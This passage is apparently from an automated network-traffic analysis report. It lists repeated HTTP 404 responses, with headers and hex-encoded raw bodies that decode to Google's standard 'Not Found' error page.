64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 